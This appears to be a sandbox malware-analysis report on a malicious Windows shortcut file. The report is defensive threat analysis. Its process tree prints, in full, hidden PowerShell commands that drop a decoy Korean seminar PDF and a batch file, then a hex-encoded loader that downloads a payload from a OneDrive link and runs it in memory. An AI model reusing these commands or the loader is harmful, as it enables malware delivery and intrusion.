Analysis

  • max time kernel
    147s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/05/2023, 02:51

General

  • Target

    aa8ba9a029fa98b868be66b7d46e927b.lnk

  • Size

    48.9MB

  • MD5

    aa8ba9a029fa98b868be66b7d46e927b

  • SHA1

    df84ef49d7a50bd04c695489ec5a528155c6caec

  • SHA256

    f92297c4efabba98befeb992a009462d1aba6f3c3a11210a7c054ff5377f0753

  • SHA512

    913fb6f0170c51c9d1f7952156d5c0009f0b3ac5fa91f63b50d9c6a2abf68a1f2cbad924be9ca76cd44a69514e63e606da55289b4a80f3a8108d10e582420b44

  • SSDEEP

    1536:W4bmPpEEoKftj6jRbmJD7bEgjQZfi1bb5nQFQ/VP1NrRNZcr8Bo571M9S:WlREIxSSRMZfi1bb5nxpRcDK9S

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\aa8ba9a029fa98b868be66b7d46e927b.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2880
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00030DD94E} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00085268 -ReadCount 00085268; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\2023년도 4월 29일 세미나.pdf'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002390)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00088506 -ReadCount 00088506; $exePath = 'C:\Users\Admin\AppData\Local\Temp\230415.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00085268)) -Encoding Byte; ^& $exePath;
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00030DD94E} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00085268 -ReadCount 00085268; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\2023년도 4월 29일 세미나.pdf'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 002390)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00088506 -ReadCount 00088506; $exePath = 'C:\Users\Admin\AppData\Local\Temp\230415.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00085268)) -Encoding Byte; & $exePath;
        3⤵
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4060
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\2023년도 4월 29일 세미나.pdf"
          4⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:216
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2644
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6E29BFEAC0846F68FA48432B9E23A3F9 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              6⤵
                PID:4124
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=71AFB917A5E1441C31247CBB7E1BE46D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=71AFB917A5E1441C31247CBB7E1BE46D --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
                6⤵
                  PID:3624
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=09757822C8312A9561439DE767971D11 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=09757822C8312A9561439DE767971D11 --renderer-client-id=4 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1
                  6⤵
                    PID:5020
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A0B1EB12368BE909643A173B41CBC0AB --mojo-platform-channel-handle=1840 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    6⤵
                      PID:2076
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=539FDB120CA5D93561F5F9FCD7EF12BD --mojo-platform-channel-handle=2576 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      6⤵
                        PID:4888
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3B76DA51CDE7E436E93CCB4052F4024B --mojo-platform-channel-handle=1884 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        6⤵
                          PID:3080
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                        5⤵
                          PID:2232
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\230415.bat""
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1204
                        • \??\c:\Windows\SysWOW64\cmd.exe
                          c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$pina="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E554652695A6E706E56553134546D4A4A626B4D3251306B5F5A5431575A456C4C536A452F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $pina.Length-2;$i=$i+2){$POLL=$pina[$i]+$pina[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));"
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4072
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -windowstyle hidden -command "$pull ="$pina="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E554652695A6E706E56553134546D4A4A626B4D3251306B5F5A5431575A456C4C536A452F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $pina.Length-2;$i=$i+2){$POLL=$pina[$i]+$pina[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));"
                            6⤵
                            • Blocklisted process makes network request
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2160
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\whehlrlz\whehlrlz.cmdline"
                              7⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4552
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE3EC.tmp" "c:\Users\Admin\AppData\Local\Temp\whehlrlz\CSCBB71920A5AC4394BC505E6C6F766021.TMP"
                                8⤵
                                  PID:4576
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wi3clxtk\wi3clxtk.cmdline"
                                7⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4092
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE534.tmp" "c:\Users\Admin\AppData\Local\Temp\wi3clxtk\CSCBEDB43769F2E43C59B5B63CF7D467EB5.TMP"
                                  8⤵
                                    PID:2116
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\11inwth0\11inwth0.cmdline"
                                  7⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3368
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE6DA.tmp" "c:\Users\Admin\AppData\Local\Temp\11inwth0\CSC9671C7C2E4E46FF9B578221C9403AD3.TMP"
                                    8⤵
                                      PID:488
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kmglb5u1\kmglb5u1.cmdline"
                                    7⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2264
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE89F.tmp" "c:\Users\Admin\AppData\Local\Temp\kmglb5u1\CSCD12D6E32146941EDBE3E2DFB2619B1A0.TMP"
                                      8⤵
                                        PID:1812
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:2964

                          Network

                          MITRE ATT&CK Enterprise v6

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                            Filesize

                            36KB

                            MD5

                            b30d3becc8731792523d599d949e63f5

                            SHA1

                            19350257e42d7aee17fb3bf139a9d3adb330fad4

                            SHA256

                            b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                            SHA512

                            523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                          • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                            Filesize

                            56KB

                            MD5

                            752a1f26b18748311b691c7d8fc20633

                            SHA1

                            c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                            SHA256

                            111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                            SHA512

                            a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                          • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                            Filesize

                            64KB

                            MD5

                            41b6ea019565d303771cfb0a077e03b0

                            SHA1

                            44617f025116991dea12d36de9bac22460f54730

                            SHA256

                            774626db5a3346fd9ff8ea1fb6a6a0d4367cdb5fe0ad24f468651e71c4488ac0

                            SHA512

                            89a2ececb7ef299719c74066b192bb60a6d553d394472e53cdad400a263a1ed54ac216b1751ea8d4c271863f853a7be9386bb2ad2eddb674c2f745ef723f5726

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            6832ae680e8ddacc9752c84ff4ee94d5

                            SHA1

                            eba38e3a46f6a27ec29c567c6766ba57fe7954ba

                            SHA256

                            19c4f3bc855b449022b1baf50569236e2d844e3f323453291495de125f76e632

                            SHA512

                            9cea7dcd3b0bf6bb6c1fd15aea43312cb52926e2e61455fcb26a6dd82323e352b9960f4afe412891be2aba54230ef354772e5397df8c6100e5aab875247fa1ef

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            18KB

                            MD5

                            14e81193af6a249f33b1fe6034695ad5

                            SHA1

                            3940b63e1dc1944b4067c7314c78914aa8df5555

                            SHA256

                            0d2f75c6b5b67c17da15ae2d8a4f26450d2ecc0a16e2218fdffa87e3d30580be

                            SHA512

                            7e8b6034e6090ce9ac7a4b22510d3f4c53f07c6666aea1a005f3cd51ef8ba1ef61afd16906f20460d8d78993610c46007fa1f2ba0c22d0b2f74144989c7c0675

                          • C:\Users\Admin\AppData\Local\Temp\11inwth0\11inwth0.dll

                            Filesize

                            3KB

                            MD5

                            63943739e0d494be4fff6c47b7a32d5f

                            SHA1

                            94fcff23906316812a6bd7c02f3754714b6ce7ba

                            SHA256

                            014255bce1e1328f40459800cac08cdc1ee29a0137913df9e8bbc3782fb9938d

                            SHA512

                            407e7bb71bb7f722dc0a0bfff210f0763c0f36c77530345a06589c6fa8695cc291cdb7c7384463627b27f754437562da88f7588cfba69a5eaffd6eb4aedb8497

                          • C:\Users\Admin\AppData\Local\Temp\2023년도 4월 29일 세미나.pdf

                            Filesize

                            80KB

                            MD5

                            9b6fbba0df9538cad77022a5344409e5

                            SHA1

                            e96d9cf4d8b392ffd02a27addf1439d965d114f0

                            SHA256

                            7ef2c0d2ace70fedfe5cd919ad3959c56e7e9177dcc0ee770a4af7f84da544f1

                            SHA512

                            cce645a976aeca0aca66129a8f99aa9fc0d7428feb79d83d7f5fb20d129500fed881f1eda556d780191bf09944cd793654859afbbfb01352a03c98eca505af06

                          • C:\Users\Admin\AppData\Local\Temp\230415.bat

                            Filesize

                            3KB

                            MD5

                            8fef5eb77e0a9ef2f97591d4d150a363

                            SHA1

                            babf2d3ad80442138b8563e6f5bb02800ee76eac

                            SHA256

                            06431a5d8f6262cc3db39d911a920f793fa6c648be94daf789c11cc5514d0c3d

                            SHA512

                            508d43f1628fa80e7b9b9de62ea8f49e52baf649779a930e1528122437e1ced528dcdac0a020f0472c8ece58dee68de23d943048f8bba325a98aea0e6bff2a51

                          • C:\Users\Admin\AppData\Local\Temp\RESE3EC.tmp

                            Filesize

                            1KB

                            MD5

                            18018ea8f5c7cc191aed0af3fb148dcc

                            SHA1

                            ba8b07d37adfd3d4e197bbcac0a5b16f705b28e0

                            SHA256

                            373f7b5d1b4e9850094f471997bdb9616056edd74ef45e8feeaa865785643afb

                            SHA512

